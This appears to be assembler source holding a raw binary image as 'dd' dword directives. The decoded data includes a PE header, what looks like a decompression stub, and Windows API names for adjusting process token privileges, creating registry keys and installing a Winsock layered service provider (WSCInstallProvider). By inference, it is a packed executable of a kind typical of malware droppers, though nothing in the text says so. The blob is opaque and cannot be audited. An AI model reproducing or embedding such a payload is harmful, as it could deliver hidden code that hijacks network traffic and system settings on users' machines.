dd 248B7E8h, 3A58324h, 164058C2h, 7FF8309h, 70E6C19h, 7C80C736h
dd 2B143221h, 8A2462FCh, 0C9880A0Ch, 97CE9226h, 0B71AA2B7h
dd 5A3A1899h, 31FDE70Fh, 0BD8A005Ah, 8A048C7Ah, 882497D8h
dd 97D081Ch, 910B90FCh, 2306E92Bh, 0D80B0AFFh, 0EFFC501Bh
dd 0E9F8FB03h, 62101F6h, 0BED4F3EBh, 50DCA98Dh, 21807ED6h
dd 0C83E188h, 0F87BA445h, 981CDFA5h, 8644AA03h, 15C15971h
dd 0A2064875h, 0F47B124h, 0B0F003BDh, 30D13846h, 0DC554508h
dd 0FA397C75h, 63B6840Fh, 0F0AA4389h, 0C09DC545h, 52080CBCh
dd 1B098241h, 0A28A91F8h, 0C88D90CAh, 4F72E99Ah, 4312B0BFh
dd 0C614C862h, 0EBF04E05h, 0F6C87B2Bh, 1BAE3BFBh, 0EBF41C94h
dd 0EC108409h, 0CEDB7C89h, 19F01273h, 2110A0C2h, 824513CDh
dd 6886377Dh, 0FD5B360Ah, 82A98AA3h, 8BAD2D91h, 1E8FBFD1h
dd 0BFDE048h, 1226CDB6h, 9A84C6E9h, 73DFEC16h, 88A1A912h
dd 1890DB43h, 540A2C5Eh, 8445018h, 4F070664h, 7CB504F8h
dd 48945203h, 7D58B698h, 0ED88AE0Ah, 6A603FC0h, 0F8FBEC48h
dd 7C509898h, 0E3344F5Ah, 0FE3CE01h, 49F9D101h, 28D302CBh
dd 8D1D7D0Eh, 8552D055h, 1A31FCC2h, 4E68C82Bh, 0F156055Eh
dd 2077140Dh, 0EBD80332h, 51FCC12Eh, 0FAA9E871h, 0A444FD28h
dd 7FD86248h, 0B3B36A44h, 0C62E950Ah, 0D3EB142Bh, 5D43B6F0h
dd 0B4C79B84h, 69367978h, 569487C2h, 273D77D5h, 0F9A41E83h
dd 0C1029A43h, 8A4D402Bh, 0A402C187h, 40410A68h, 408912FFh
dd 393B0574h, 2882AF5Eh, 93E6F072h, 820FF809h, 72CDFD46h
dd 5C41305Ch, 5CF5EB2Ch, 5058C95Bh, 0EB851626h, 23190F6h
dd 8AE90410h, 9570A78Ch, 8D06001h, 0CA8CCC64h, 0C98D0130h
dd 0BC9BF408h, 6C01BB6h, 1A40F04h, 0D2522B31h, 3125011Ch
dd 9C4BFC9h, 18AE8213h, 66813E02h, 19A1C862h, 99493606h
dd 1C6DEBB9h, 0A0AAFC3h, 80F91C0h, 9E8014Ah, 5138D6F4h
dd 0B70098D0h, 0E8AAF314h, 1EB6F4Ah, 6185325h, 5597B828h
dd 815D10E8h, 9212D8EDh, 0DCCB58Dh, 0F49468Bh, 0C031900Fh
dd 0DEF02B04h, 1DB1B056h, 1C768B80h, 0BD8DF203h, 0ABAD30C4h
dd 487B3404h, 0DC6DF801h, 8B157401h, 0F6854473h, 7923B90Eh
dd 0C8407B3Eh, 0FAEA3BF3h, 0B450A4F3h, 8E4B8F8Ch, 0B46F2F01h
dd 2C511705h, 0E82A530Dh, 190E34Bh, 29B0858Bh, 1018C7B0h
dd 1B60727h, 2C4E8B4Bh, 0CC0324C6h, 22708D89h, 6A35FC4Eh
dd 0D651D740h, 0D609AC5h, 0BC858912h, 32E6DB25h, 2C1BC498h
dd 381308B2h, 30289472h, 8161450Ch, 60024343h, 0C985344Eh
dd 3D9A625Bh, 8033C62h, 6B0D3A51h, 0B5C402A3h, 958B7B74h
dd 8DD8196Fh, 12440D73h, 0C40C8830h, 2DEBD2A2h, 8057C1F7h
dd 81521E74h, 60CC44E1h, 567F4BC2h, 50319185h, 0FF1CCC0Eh
dd 284E160Eh, 1D26E495h, 341A055h, 522C856Dh, 0D965C3Fh
dd 421A066Ah, 4A851014h, 0E095BC1Ch, 359C0815h, 0A2848880h
dd 35DE431Ch, 600C4375h, 4BFC7E02h, 0F703F140h, 0C5E906C6h
dd 23042B05h, 4689E624h, 57BC3501h, 48242E8h, 0D624D64Fh
dd 0C7031328h, 0DA498008h, 0B5870C45h, 270C92BCh, 28825109h
dd 5B5F5E5Dh, 0B8FCC4DDh, 819001E8h, 0EB815B08h, 75C9148Fh
dd 51CB030Eh, 850E93FFh, 0F6A72248h, 0D3470456h, 498EC1FBh
dd 7402AFFBh, 6445216h, 0B1C3AFD5h, 0C844FC75h, 0AB0CDCABh
dd 0C2835A03h, 0C6E4EB04h, 0C57506ACh, 991EC9AFh, 5A2A45E1h
dd 479C7DF8h, 92435F80h, 0C33BD83Eh, 38775974h, 0F30352E9h
dd 0C8B03C76h, 4AD82BD3h, 6881ADF8h, 73DAF8EBh, 8E983C8h
dd 21E4250Eh, 0C766ED4Dh, 1BFB6645h, 66ADCF16h, 0A3D80410h
dd 1E03FB7Dh, 81F88B84h, 7F493F0Dh, 0FB8A0FE7h, 3A0CE8C1h
dd 0FFCDC9D8h, 4807019Bh, 4971F229h, 76B7EBD2h, 4A1F3F73h
dd 0DC66C120h, 28278153h, 3075B0Ch, 0F4EB085Bh, 0F2190C23h
dd 190829Fh, 351CE8FAh, 0E35423C4h, 0C4483C15h, 48C99302h
dd 70A743Ch, 0B102EFEh, 0EB500AE0h, 5589B607h, 46B70FF8h
dd 75A8A910h, 8A4C907Dh, 747708EEh, 0AB5831F1h, 0FC4A6C78h
dd 36125E40h, 403C8012h, 0CF3BF8F4h, 4606347Dh, 1D0B60Fh
dd 0E82CFC55h, 0FA063B2h, 0C8FE7448h, 1C75D78Ah, 0DD0382Ah
dd 49CC2689h, 10C0081Dh, 60EC486h, 0E7EB9801h, 4CEBB0Ch
dd 0EAC8EB41h, 5E249706h, 9246BC59h, 302A3B35h, 0B1422998h
dd 0F167EA6h, 8A0188E9h, 0EB9DBA1Ah, 378E5117h, 0EC83C25Ch
dd 8186602h, 1276FC4Ah, 59FE1652h, 91491C8Eh, 2FB04D56h
dd 0E5DFD657h, 0A11FDFBEh, 0A2C16C8h, 4EBCA6E5h, 0ED43CDDEh
dd 2618B294h, 0E04D7443h, 287D1C73h, 0EDF8084Bh, 0C1710B03h
dd 0A5F302F9h, 28E1831Dh, 0FF914348h, 0FA16047Bh, 19D16FA4h
dd 7C421B36h, 5AAACAABh, 323B60CEh, 2040563Dh, 0C3A6328Dh
dd 40A2A275h, 6AA11FD1h, 479A9C17h, 6091B948h, 51F00E02h
dd 8A915652h, 0C8A85317h, 0BFBB89D6h, 0C295EC7Dh, 6E161A83h
dd 36C82B48h, 2F9921B2h, 7C205E13h, 164F6004h, 0E8CA9383h
dd 0F40E4806h, 6F084952h, 54A922C4h, 708B8D0Fh, 30711E51h
dd 0EC06D971h, 744012D3h, 92DDD441h, 291246B5h, 0FB6EC215h
dd 68F369Fh, 285ACAEBh, 1B6B0B8Ch, 7D3BFA90h, 0EBF90E96h
dd 0C589DA11h, 0C740F327h, 0CDF73005h, 0E02D35CDh, 0E38F392Bh
dd 5E499C52h, 3916AED2h, 8400BDAh, 652AAD2Dh, 0E402D4Ah
dd 9240190h, 0F1D73296h, 7339C05Dh, 9A841D43h, 247406F4h
dd 1EA60803h, 843E85Fh, 1240C26h, 107E833Dh, 7B21FF85h
dd 53515750h, 40B518E8h, 905377E1h, 15C64859h, 0E74096E9h
dd 0AFC5EB14h, 8252D91Bh, 45198588h, 0D883890Ch, 967310C2h
dd 0F6087112h, 0A0938B46h, 3F25F232h, 0BAD2E699h, 61CDA1B4h
dd 4E677192h, 725C4EEBh, 242420E9h, 0D5C6E598h, 145507A7h
dd 0D602D285h, 0E7EB0DE1h, 0C7F22A83h, 2C846044h, 4085A291h
dd 22A95552h, 5F052509h, 6A20B4E0h, 3220EEBh, 87838C41h
dd 51B0E395h, 22658740h, 5AB854A3h, 49C29D69h, 224A134h
dd 0B0EBC45Bh, 0CD79159Eh, 0FC8DA4DAh, 5ED601B5h, 3033F33Ah
dd 0C889F12Bh, 75C57DE0h, 3B1C19D0h, 0EBFC0C4Dh, 0A51536F3h
dd 0FC742093h, 82902138h, 1AB008AFh, 0B53C4068h, 2E481448h
dd 7C8D16C1h, 50FC0301h, 10500244h, 0C173A881h, 27478AACh
dd 8D05E9A8h, 2C746822h, 0DA201288h, 0D2317521h, 0E5EB22Eh
dd 3510CA8Ah, 30C42212h, 0FE07250Ch, 41C890A7h, 74071E70h
dd 63696C10h, 6E6F7461h, 3D726520h, 54DCF81Eh, 0F1FF1F68h
dd 63127033h, 25147564h, 7CF2F973h, 0F5BD6C7Dh, 746EE5D9h
dd 0FB772062h, 365B7DDBh, 0AB315E69h, 4453C71Ch, 352E474Ch
dd 612C6478h, 0D2BC3E6Ch, 463320BBh, 82A76C69h, 0E853EC33h
dd 1C747075h, 0FBA1EF2Ah, 4B4D8A0Eh, 94737557h, 3C9E3233h
dd 614D0EDEh, 83DD1867h, 786F42C3h, 949D7741h, 13326674h
dd 2114CA99h, 9C0980C6h, 9D473E8h, 5CEE00E0h, 45F0419Ah
dd 50746978h, 0A4DC1460h, 8A4384CEh, 6E6148A0h, 0F5E2B64h
dd 704FF2DCh, 0CF542918h, 4D74471Fh, 1E1C6CEEh, 4192F768h
dd 63B841F5h, 0B80EE286h, 62447349h, 72816775h, 33224424h
dd 247060DBh, 94EE72Ah, 0D65F4236h, 6E89170Ah, 0A4855F01h
dd 259B0354h, 1E0h, 60006C00h, 2424748Bh, 28247C8Bh, 33DB33FCh
dd 2B3A4D2h, 6DE8h, 33F67300h, 64E8C9h, 1C730000h, 5BE8C033h
dd 73000000h, 4102B323h, 4FE810B0h, 12000000h, 75F773C0h
dd 0D4EBAA3Fh, 4EE8h, 75CB2B00h, 43E810h, 28EB0000h, 74E8D1ACh
dd 0EBC9134Eh, 0C148911Ch, 0E8AC08E0h, 2Dh, 7D003Dh, 800A7300h
dd 67305FCh, 777FF883h, 95414102h, 1B3C58Bh, 2BF78B56h
dd 5EA4F3F0h, 0D2038EEBh, 0AD920675h, 42D20392h, 41C933C3h
dd 0FFFFEDE8h, 0E8C913FFh, 0FFFFFFE6h, 2BC3F272h, 8928247Ch
dd 611C247Ch, 0CC2h, 0D2C8h, 12B8h, 7B8h, 0DE47h, 0D068h
dd 0D06Ch, 10000000h, 0D060h, 0D064h, 0CD1FB8h, 1C888D00h
dd 89100012h, 548B0141h, 528B0424h, 0E902C60Ch, 2B05C283h
dd 0FC4A89CAh, 0B8C3C033h, 12345678h, 58F64h, 83000000h
dd 535504C4h, 52565751h, 11D5988Dh, 538B1000h, 0E88B5218h
dd 68406Ah, 0FF000010h, 6A0473h, 3104B8Bh, 0FF018BCAh
dd 0F88B5AD0h, 338B5250h, 320438Bh, 89088BC2h, 438B204Bh
dd 8BC2031Ch, 1C4B8908h, 4B8BF203h, 8DCA030Ch, 57501C43h
dd 5AD1FF56h, 8430358h, 8B52F88Bh, 0FC468BF0h, 2B04C083h
dd 85689F0h, 89104B8Bh, 4B8B244Eh, 4E895114h, 0C4B8B28h
dd 0FF144E89h, 0C88589D7h, 8B100012h, 0EB5A59F0h, 68CA030Ch
dd 8000h, 0FF57006Ah, 5AC68B11h, 5B595F5Eh, 0E0FF5Dh, 6 dup(0)
dd 0D000h, 10h, 3F0C32A5h, 3F19h, 396h dup(0)
dd 0C8h, 20h, 616F4C01h, 62694C64h, 79726172h, 47010041h
dd 72507465h, 6441636Fh, 73657264h, 4D010073h, 69746C75h
dd 65747942h, 69576F54h, 68436564h, 1007261h, 43746547h
dd 65727275h, 7250746Eh, 7365636Fh, 53010073h, 7065656Ch
dd 65470100h, 61745374h, 70757472h, 6F666E49h, 6C010041h
dd 6C727473h, 416E65h, 74654701h, 706D6554h, 68746150h
dd 47010041h, 6F4D7465h, 656C7564h, 656C6946h, 656D614Eh
dd 47010041h, 6F4D7465h, 656C7564h, 646E6148h, 41656Ch
dd 74654701h, 74737953h, 69446D65h, 74636572h, 4179726Fh
dd 65470100h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 1004179h, 64616F4Ch, 6F736552h, 65637275h, 69530100h
dd 666F657Ah, 6F736552h, 65637275h, 69460100h, 6552646Eh
dd 72756F73h, 416563h, 74654701h, 7473614Ch, 6F727245h
dd 0D5000072h, 0
dd 1000000h, 6E65704Fh, 636F7250h, 54737365h, 6E656B6Fh
dd 6F4C0100h, 70756B6Fh, 76697250h, 67656C69h, 6C615665h
dd 416575h, 6A644101h, 54747375h, 6E656B6Fh, 76697250h
dd 67656C69h, 1007365h, 51676552h, 79726575h, 756C6156h
dd 41784565h, 65520100h, 65724367h, 4B657461h, 78457965h
dd 52010041h, 704F6765h, 654B6E65h, 41784579h, 65520100h
dd 6F6C4367h, 654B6573h, 0E2000079h, 64000000h, 0FF000000h
dd 0FAFF1186h, 9D0FF09h, 0FF1663FFh, 41FF0F52h, 144FFF04h
dd 0FF095CFFh, 0B4FF0D12h, 14B6FF14h, 0FF0AA5FFh, 5AFF0FEFh
dd 14BBFF12h, 0FF14A9FFh, 0A6FF1652h, 0C4BFF0Bh, 0FF18E7FFh
dd 40FF1171h, 0CBEFF0Ch, 0FF0BA9FFh, 0A0FF0C09h, 0EF6FF0Bh
dd 0FF0EF7FFh, 7FF0EF1h, 0FF0FF0Ch, 0FF120EFFh, 9AFF1148h
dd 231FF0Eh, 0FF0339FFh, 6BFF032Fh, 10B2FF10h, 0FF0628FFh
dd 62FF0490h, 1442FF01h, 0FF07BBFFh, 0DFFF0299h, 21DFF04h
dd 0FF0219FFh, 17FF0321h, 21CFF02h, 0FF106AFFh, 5AFF039Ch
dd 320FF03h, 0FF035CFFh, 41FF0CBBh, 0EC0012h, 1500000h
dd 5F010000h, 746E6F63h, 666C6F72h, 5F010070h, 65637865h
dd 685F7470h, 6C646E61h, 337265h, 735F5F01h, 615F7465h
dd 745F7070h, 657079h, 705F5F01h, 6D665F5Fh, 65646Fh, 705F5F01h
dd 6F635F5Fh, 646F6D6Dh, 5F010065h, 756A6461h, 665F7473h
dd 766964h, 735F5F01h, 73757465h, 616D7265h, 72656874h
dd 5F010072h, 74696E69h, 6D726574h, 5F5F0100h, 6D746567h
dd 616E6961h, 736772h, 63615F01h, 6E6C646Dh, 78650100h
dd 1007469h, 7063585Fh, 6C694674h, 726574h, 78655F01h
dd 1007469h, 7465735Fh, 7063626Dh, 63770100h, 79706373h
dd 63770100h, 74616373h, 6F5F0100h, 6978656Eh, 5F010074h
dd 6C6C645Fh, 78656E6Fh, 1007469h, 65706F66h, 6601006Eh
dd 736F6C63h, 74010065h, 656D69h, 61727301h, 100646Eh
dd 78435F5Fh, 61724678h, 6148656Dh, 656C646Eh, 6D010072h
dd 6F6C6C61h, 66010063h, 656572h, 0F700h, 1B800h, 70520100h
dd 72745363h, 46676E69h, 41656572h, 75550100h, 6F546469h
dd 69727453h, 41676Eh, 69755501h, 65724364h, 657461h, 10200h
dd 1C800h, 53570100h, 756E4543h, 6F72506Dh, 6F636F74h
dd 100736Ch, 49435357h, 6174736Eh, 72506C6Ch, 6469766Fh
dd 7265h, 0
dd 4550h, 2014Ch, 45D07FBBh, 2 dup(0)
dd 10F00E0h, 6010Bh, 2800h, 8C00h, 0
dd 284Eh, 1000h, 4000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 0D000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3034h, 8Ch, 4000h, 8AD8h, 12h dup(0)
dd 1000h, 1D4h, 6 dup(0)
dd 7865742Eh, 74h, 2644h, 1000h, 2800h, 400h, 3 dup(0)
dd 0E0000020h, 7273722Eh, 63h, 8AD8h, 4000h, 8C00h, 2C00h
dd 3 dup(0)
dd 40000040h, 0C000h, 0
dd 0C3CC0000h, 68860000h, 0FF5B360Ah, 8D85FFFFh, 9182A98Ah
dd 0D18BAD2Dh, 481E8FBFh, 0B60BFDE0h, 0E91226CDh, 169A84C6h
dd 0DBFF8B74h, 0A92EDFECh, 0DB4388A1h, 2C5E1890h, 4450DF0Ah
dd 2FFFFFFDh, 4F07064Ch, 7CB504F8h, 48945203h, 7D58B698h
dd 0ED88AE0Ah, 6A603FC0h, 0FFC4EC48h, 98D8BFFFh, 5A7C5098h
dd 1E3344Fh, 10FE3CEh, 0CB49F9D1h, 0E28D302h, 0FFE31D7Dh
dd 528A11BFh, 31FCC285h, 68C82B1Ah, 56055E4Eh, 3140DF1h
dd 746FFFFFh, 2E420332h, 7151FCC1h, 28FAA9E8h, 48A444FDh
dd 447FD862h, 0FFD1B36Ah, 0AB3FFFFh, 2BC62E95h, 0F0D3EB14h
dd 845D43B6h, 78B4C79Bh, 0C2693679h, 0D5569487h, 0BFFFF6FCh
dd 1E8327E4h, 9A43F9A4h, 402BC102h, 0C1878A4Dh, 41BCA402h
dd 8912FF40h, 77FFFFFFh, 5E393B36h, 722882AFh, 993E6F0h
dd 46820FF8h, 5C72CDFDh, 2C5C4130h, 5B5CF5EBh, 0FFFFF12Bh
dd 265058C9h, 0F6EB8516h, 10023190h, 8C8AE904h, 19570A7h
dd 0ADFFC768h, 8CCC7FFFh, 8D0130CAh, 9BF408C9h, 0C01BB6BCh
dd 1A42206h, 0D2522B31h, 0F85F011Ch, 0C95C42FFh, 1309C4BFh
dd 218AE82h, 4B66813Eh, 360619A1h, 0FFFFFFFFh, 0EBB99949h
dd 0AFC31C6Dh, 91C00A0Ah, 14A080Fh, 0D6F409E8h, 98D05138h
dd 0F314B700h, 6F4AE8AAh, 0B605FFFFh, 385335EBh, 5597B828h
dd 815D10E8h, 9212D8EDh, 0DCCB58Dh, 0FB7FFFFAh, 0F49468Bh
dd 4C0770Fh, 56DEF02Bh, 801DB1B0h, 31C768Bh, 0C4BD8DF2h
dd 0FFFFFF30h, 34042C97h, 0F801487Bh, 7401DC6Dh, 44738B15h
dd 0B90EF685h, 7B3E7923h, 3BF3C840h, 0FFFFFFFFh, 0A4F3FAEAh
dd 8F8CB450h, 2F018E4Bh, 1705B46Fh, 530D2C51h, 0E34BE82Ah
dd 858B0190h, 0C7B029B0h, 0FE05FFFFh, 7271018h, 374B01B6h
dd 324C62Ch, 708D89CCh, 35FC4E22h, 51D7406Ah, 0E0D0BFFFh
dd 259AC5D6h, 25BC850Eh, 9832E6DBh, 0B22C1BC4h, 6E051308h
dd 7238F8D5h, 5C302894h, 0CF43433Ah, 0FFE05FFFh, 0C985344Eh
dd 3D9A625Bh, 9D033C62h, 0A36B0D3Ah, 74B5C402h, 6F958B7Bh
dd 0FFFFFFF8h, 738DD819h, 3012440Dh, 0A2C40C88h, 0F72DEBD2h
dd 748057C1h, 0E181521Eh, 0C260CC44h, 0FFFFFF4Bh, 91852517h
dd 0CC0E5031h, 160EFF1Ch, 0E495284Eh, 0A0551D26h, 856D0341h
dd 5C3F522Ch, 0FEB7FFFFh, 66A0D96h, 914421Ah, 95BC1C4Ah
dd 9C0815E0h, 84888035h, 0DE431CA2h, 5FF7535h, 0C43FFFEh
dd 0FC7E0260h, 3F1404Bh, 0E906C6F7h, 230428C5h, 4689E624h
dd 4BFD3501h, 57BCFFFDh, 48242E8h, 0D624D64Fh, 0C7031328h
dd 45DA49E6h, 0BCB5870Ch, 6F0B5BFFh, 51092766h, 5BEB5DC3h
dd 0B8FCC4DDh, 819001E8h, 0FFFFFFFFh, 0EB815B08h, 75C9148Fh
dd 51CB030Eh, 850E93FFh, 0F6A72248h, 0D3470456h, 498EC1FBh
dd 7402AFFBh, 0C4BFFFFFh, 0D5085216h, 75B1C3AFh, 0ABC844FCh
dd 3AB0CDCh, 4C2835Ah, 0ACC6E4EBh, 0FFFFF5BFh, 0AFC57506h
dd 0E1991EC9h, 0F85A2A45h, 80479C7Dh, 3E92435Fh, 5974C3DFh
dd 0FFFF3877h, 52E9FFFFh, 3C76F303h, 2BD3C8B0h, 0ADF84AD8h
dd 0F8EB6881h, 83C873DAh, 250E08E9h, 0ED4D21E4h, 556FC766h
dd 6645FFFEh, 0CF161BFBh, 41066ADh, 0FB7DA3D8h, 0D81E603h
dd 44BFFF3Fh, 0E77F49FBh, 6C768A0Fh, 0CDC9D83Ah, 7019BFFh
dd 71F22948h, 0FFFFC049h, 76B72A0Bh, 4A1F3F73h, 0DC66C120h
dd 28278153h, 3075B0Ch, 0C2FFFF5Bh, 23F407BFh, 9FF2190Ch
dd 0E8FAAF82h, 23C4351Ch, 3C15E354h, 9302C448h, 0F855A3C9h
dd 743C48FFh, 2EFE070Ah, 0AE00B10h, 0F7C2EB50h, 0FFFFEAAAh
dd 1046B77Fh, 7D75A8A9h, 0EE8A4C90h, 0F1747708h, 78AB5831h
dd 40FC4A6Ch, 4B12125Eh, 80AA5FFCh, 0F8F4403Ch, 347DCF3Bh
dd 77B69B06h, 817FFFFFh, 0B2E82C24h, 480FA063h, 8AC8FE74h
dd 2A1C75D7h, 890DD038h, 0B49CC26h, 1DC1BFFCh, 0C4866A08h
dd 9801060Eh, 0BB0CE7EBh, 0FFEBE7CEh, 0C8EB7FFFh, 5E7B06EAh
dd 9246BC59h, 302A3B35h, 0B1422998h, 0F167EA6h, 8A0188E9h
dd 7FF6811Ah, 0EB9DBAE3h, 5C378E4Eh, 2EC83C2h, 69081866h
dd 0FFFF4B4Dh, 0FE16527Fh, 491C8E59h, 0B04D5691h, 0DFD6572Fh
dd 1FDFBEE5h, 0EC16C8A1h, 0FF817FE5h, 4EBCA6FFh, 0ED43CDDEh
dd 2618B294h, 0E04D7443h, 4B511C73h, 3EDF808h, 7FFFFF0Bh
dd 247718Bh, 831DA5F3h, 434828E1h, 47BFF91h, 6FA4FA16h
dd 1B3619D1h, 0F02FFB42h, 0CAAB7CFFh, 60CE5AAAh, 563D323Bh
dd 0A6329040h, 0A2A275C3h, 6F4ED140h, 6A7FC6FDh, 479A9C17h
dd 0F91B948h, 5251F00Eh, 5317AC56h, 6FADFFA8h, 89D6C8FFh
dd 0EC7DBFBBh, 161A8995h, 3618486Eh, 2F9921B2h, 0FF205E13h
dd 7CFFFFFFh, 164F6004h, 0E8CA9383h, 0F40E4806h, 6F084952h
dd 54A922C4h, 708B8D0Fh, 30711E51h, 8106D971h, 0ECE97FFFh
dd 41EE12D3h, 0B592DDD4h, 15291246h, 9FFB6EC2h, 2D4B8F36h
dd 0CA7D0BFEh, 1E8C285Ah, 3BFA901Bh, 0F90E967Dh, 0FFFFFE9Fh
dd 0C589DAFFh, 0C740F327h, 0CDF73005h, 0E02D35CDh, 0E38F392Bh
dd 5E499C52h, 3916AED2h, 8400BDAh, 0B7F4BFFFh, 4A652AEAh
dd 510E402Dh, 32960924h, 0C05DF1D7h, 1D437339h, 0FFFE3784h
dd 6F49AF2h, 1EA60874h, 843E85Fh, 1240C26h, 0D97E833Dh
dd 0FFF521FFh, 507BF42Fh, 180F5157h, 77E140B5h, 48599053h
dd 96E915C6h, 8DFFE740h, 62A2A37Fh, 8252D91Bh, 0BE198588h
dd 0C2D88389h, 12967310h, 0C4BFFFFFh, 8B340871h, 0F232A093h
dd 0E6993F25h, 0A1B4BAD2h, 719261CDh, 4EEB4E67h, 0FFFFF0BFh
dd 20E9725Ch, 0E5982424h, 7A7D5C6h, 0D2851455h, 0DE1D602h
dd 0F22A83AFh, 0FFFE44C7h, 8460FFFFh, 85A2912Ch, 0A9555240h
dd 5250922h, 20B4E05Fh, 220EEB6Ah, 838C4103h, 0B0E39587h
dd 37FFFF51h, 0A322A220h, 695AB854h, 3449C29Dh, 5B0224A1h
dd 9EB0EBC4h, 0FFFFFFFCh, 0DACD7915h, 0B5FC8DA4h, 3A5ED601h
dd 2B3033F3h, 0E0C889F1h, 0D075C57Dh, 4D3B1C19h, 0FFF8FC0Ch
dd 365A1BFFh, 2093A515h, 2138FC74h, 8AF8290h, 40681AB0h
dd 1448B53Ch, 0F02FFF48h, 8D166E17h, 0FC03017Ch, 105002C5h
dd 0C173A881h, 27478AACh, 0FFFFFFD6h, 8D05E9A8h, 2C746822h
dd 0DA201288h, 0D2317521h, 0E5EB22Eh, 3510CA8Ah, 0B4A52212h
dd 0CE37FC4h, 90A7AE25h, 1E7041C8h, 69CF7407h, 54BD1BFFh
dd 206E6F9Eh, 0F81E3D84h, 1F6854DCh, 0FFE0F1FFh, 7033FFFFh
dd 75646312h, 0F9732514h, 6C7D7CF2h, 0E5D9F5BDh, 2062746Eh
dd 7DDBFB77h, 0D4BFA35Bh, 315EB45Fh, 53C71CABh, 352E47B4h
dd 9B2C6478h, 7F451BE1h, 0BBD2BC3Eh, 0A7BD3320h, 4EEC3382h
dd 78DEDEA5h, 0C3747075h, 6CFBA1EFh, 0C2574B4Dh, 0A37EA5FDh
dd 3C9ED794h, 0A74D0EDEh, 0C383DD18h, 0FFFF6F42h, 776D4BFFh
dd 6674949Dh, 0CA991332h, 80C62114h, 73E89C09h, 0E009D4h
dd 419A5CEEh, 6EADFFAh, 4D6978FAh, 0A4DC1460h, 8A4384CEh
dd 6FA97FA0h, 5E2BD32Ah, 0A8F2DC0Fh, 0CF542918h, 0FF02471Fh
dd 0EEAC1BFFh, 681E1C6Ch, 0F54192F7h, 8663B841h, 49B80EE2h
dd 0AB7FD460h, 7281E288h, 33224424h, 0FFE060DBh, 0E7A70BFFh
dd 4236094Eh, 170AD65Fh, 5F016E89h, 354A485h, 0A8E0259Bh
dd 14394B8Dh, 28B60B4h, 0DBFDDF24h, 0FC28E0A5h, 0A4D23329h
dd 6DE802B3h, 33F67317h, 0B7EEE8C9h, 864BFE7h, 0E8C0331Ch
dd 411A235Bh, 4FE810B0h
dd 0EEED9B0Bh, 73C012FFh, 0AA3F75F7h, 4EE8D4EBh, 75CB2B0Dh
dd 28EB4316h, 0F8B7FF77h, 74E8D1ACh, 1CEBA24Eh, 0E0C14891h
dd 2DE8AC08h, 7D003D15h, 77FEDFA9h, 0FC800A3Dh, 83067305h
dd 45777FF8h, 0C58B9541h, 17FFF1B3h, 0F78B7068h, 0EB5EF825h
dd 75D2038Eh, 92AD9206h, 6EDE015Ah, 75C34206h, 7CEDE841h
dd 77BADE43h, 72068EA5h, 9A2BC3F2h, 611C0389h, 76E697C2h
dd 0D2C87C03h, 712B803h, 8C0DE47h, 0D0682EE0h, 6B10A3C2h
dd 4B74BDB1h, 0CD1FB864h, 268A8D04h, 7C405FF0h, 1418910h
dd 0C60C52B4h, 5ADFE902h, 91292817h, 0CF0189CAh, 5678B8C3h
dd 0FBC404BFh, 8F641234h, 55C93705h, 56575153h, 0FB60DAB4h
dd 0D5988D52h, 0D58B3211h, 4DA84952h, 685C1B15h, 2B73FF2Eh
dd 0C0ADFFC4h, 3104B8Bh, 0FF018BCAh, 1BFF5AD0h, 7D0A22ADh
dd 20438B33h, 0E6C0A1Fh, 204BDB26h, 25E31C09h, 0DBAB690Ch
dd 50108DB6h, 43D1FF49h, 97134F03h, 2C2D5AD8h, 83FC10F0h
dd 76EDB90Dh, 85689F7h, 244E8947h, 6511405h, 737B2E28h
dd 1405BC1Bh, 0C8BBD7FFh, 5A5927A7h, 0B56F3FEBh, 5568A099h
dd 8B8F5771h, 0B1AC5AC6h, 591606D4h, 1FFC9h, 298AA47Fh
dd 32A5D2D0h, 3F193F0Ch, 15490142h, 0A02B89Dh, 0C0C88F12h
dd 522013AAh, 43FFE201h, 174D556h, 746C754Dh, 74794269h
dd 0F550BB6Ah, 576F5465h, 266843BAh, 2BFD8800h, 5301E3A9h
dd 7065656Ch, 3550CE19h, 4FCD7703h, 55586FF5h, 65541A9Eh
dd 0D556706Dh, 0D0851CCh, 15553BCAh, 13334822h, 0D55642AAh
dd 5001AADEh, 6157AB2h, 0DBB6C340h, 0DA0DA26Fh, 156C0DF6h
dd 6F8A52C6h, 7D96DB97h, 698E90D7h, 666F657Ah, 1D6E650Fh
dd 259E5B5Ah, 45614C57h, 10403CC3h, 0D50216A0h, 0C16DAF3Dh
dd 0EED1220Ch, 86550B6Bh, 76B5001h, 0D00354CBh, 3F64AABDh
dd 8655AD41h, 1B23B164h, 1BC00804h, 38118B59h, 80135558h
dd 0C05B9A79h, 83CB5AAAh, 86FF6FE2h, 86FF9C30h, 9FAFF11h
dd 6302D0FFh, 0EDB7FF16h, 0F52FFDBh, 0FF0441FFh, 5CFF144Fh
dd 0FF0D120Eh, 2B608B4h, 0B6DF0AA5h, 0EFFFDBE5h, 0FF125A17h
dd 5202A9BBh, 0FF0BA626h, 5DB6DB4Bh, 0FF780CAAh, 8403B71h
dd 65A902BEh, 116DB2FBh, 0F6A00509h, 2F7FF0Eh, 0D96DB7F1h
dd 0F00E07B6h, 23480E35h, 2310E9Ah, 0FB7CBEDFh, 0FF0339FFh
dd 106B022Fh, 628B2FFh, 626890FFh, 7C42FF01h, 506FB6DBh
dd 99FF07BBh, 1D0EDF1Dh, 0FF021923h, 0DBE5B621h, 1C0517B6h
dd 0FF106A0Bh, 20025A9Ch, 596D4016h, 0FE50BB5Ch, 0C366D556h
dd 1503EECh, 7C9D635Fh, 663BA000h, 0E7650B70h, 0D6FF685Fh
dd 72CA23BAh, 0E65F1133h, 7070610Fh, 7079745Fh, 9DBA80E6h
dd 665F0965h, 1200B7Eh, 6D3D6EB3h, 0D8E60C0Dh, 0E376CDAh
dd 5396D43h, 0DC17B9F2h, 69CC1172h, 1C107474h, 0A377ED67h
dd 731018B5h, 63397367h, 0BB686E6Dh, 7DB70CD6h, 63580E21h
dd 337BDF82h, 13916700h, 677B6D4Dh, 6362DDDBh, 736377A2h
dd 61077906h, 6B0BD19h, 5F225830h, 743B0CF6h, 0AEC5C686h
dd 7A66306h, 52DDB9FEh, 73056D0Ch, 4328D672h, 1467878h
dd 0BD8CDEDh, 8B65B16Dh, 7B404F0Dh, 0F7FD2F06h, 220B81Ah
dd 70523F00h, 1281963h, 0F7152E0Dh, 119B4755h, 123ED66Ch
dd 1A2F270Eh, 266BC00h, 23A33C8h, 0F7000E00h, 8A50AE98h
